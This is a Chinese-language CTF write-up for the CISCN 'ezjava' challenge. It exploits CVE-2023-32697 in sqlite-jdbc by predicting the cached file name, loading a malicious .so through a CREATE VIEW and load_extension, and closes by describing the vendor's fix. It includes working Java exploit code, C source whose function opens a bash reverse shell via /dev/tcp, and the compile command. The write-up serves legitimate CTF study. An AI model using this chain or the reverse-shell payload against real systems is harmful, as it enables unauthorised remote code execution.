CISCN ezjava
一般来说打java的JDBC都是MySQL或是PostgreSQL,这两个条件比较容易触发,但是这里虽然能控制JDBC但是没有利用链就打不了,回到题目
很明显可以知道这里定义了四种JDBC的连接方式,第三中就是Sqlite,跟进sqliteDatasourceConnector.getTableContent
SQL语言可是可控的,往上看到SqliteDatasourceConnector
方法
这个构造方法开启了load_extension功能,也就是可以加载文件,其实这里开不开都无所谓,因为JDBC是可以直接开启load_extension的
最早的利用文章是这里:HITB SECCONF全英文的PDF,更推荐这篇,CVE-2023-32697——sqlite jdbc RCE
利用思路很简单,就是通过JDBC来写入恶意文件,再通过控制SQL语句加载恶意文件实现RCE,先看写入恶意文件
当我们用JDBC远程加载一个恶意文件时,Sqlite会缓存这个恶意文件,并将其保存在/tmp目录下,重命名为sqlite-jdbc-tmp-??????这个命名我们是可以预测到的,就是传入URL的hashCode
package org.example;
import java.net.URL;
public class App {
public static void main(String[] args) throws Exception{
String url = "http://ip:8001/exp.so";
Integer hash = new URL(url).hashCode();
String dbFileName = String.format("sqlite-jdbc-tmp-%d.db", Integer.valueOf(hash));
System.out.println(dbFileName);
}
}
编写so文件,这里用的boogipop师傅给出的代码
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
void flag() {{
system("bash -c 'bash -i >& /dev/tcp/ip/8888 <&1'");
}}
void space() {{
static char waste[500 * 1024] = {{2}};
}}
编译为so文件
gcc -shared -fPIC exp.c -o exp.so
下面就来到最难的地方,虽然我们能够控制tableName,但是想要执行load_extension肯定是不行的,需要用到CREATE VIEW来劫持select的方法,执行CREATE VIEW之后,db文件会插入CREATE VIEW语句(DDL),因此形成了一个恶意数据库文件,这时再通过load_extension函数加载so文件中的恶意代码
String sql = "CREATE VIEW security as SELECT ( SELECT load_extension('/tmp/sqlite-jdbc-tmp--1726875147.db','flag'));";
生成一个恶意的db文件来加载/tmp/sqlite-jdbc-tmp--1726875147.db
package org.example;
import java.io.File;
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.PreparedStatement;
public class Main {
public static void main(String[] args) {
try {
String dbFile = "poc.db";
File file = new File(dbFile);
Class.forName("org.sqlite.JDBC");
Connection conn = DriverManager.getConnection("jdbc:sqlite:"+dbFile);
System.out.println("Opened database successfully");
String sql = "CREATE VIEW security as SELECT ( SELECT load_extension('/tmp/sqlite-jdbc-tmp--1727938645.db','flag'));"; //向其中插⼊传⼊的三个参数
PreparedStatement preStmt = conn.prepareStatement(sql);
preStmt.executeUpdate();
preStmt.close();
conn.close();
} catch (Exception e) {
e.printStackTrace();
}
}
}
题目环境已经开启了load_extension,如果没有开启,就再添加一个步骤,用JDBC配置load_extension,加载恶意db文件的缓存db文件
jdbc:sqlite:file:/tmp/sqlite-jdbc-tmp-hashcode.db?enable_load_extension=true
总的来说利用链很简单,难点更多的在于执行SQL语句哪里,要通过CREATE VIEW劫持SELECT,相较于其他两种常见的JDBC反序列化,Sqlite jdbc要实现RCE就比较苛刻了要同时满足控制JDBC和SQL语句
官方对于这个RCE的修复也特别简单,直接把缓存文件的文件名生成方法改了,从原来的hashCode修改为randomUUID,这样即使能控制SQL语句,也会因为无法定位恶意文件而不能RCE,该说不说这确实是最简单暴力的方法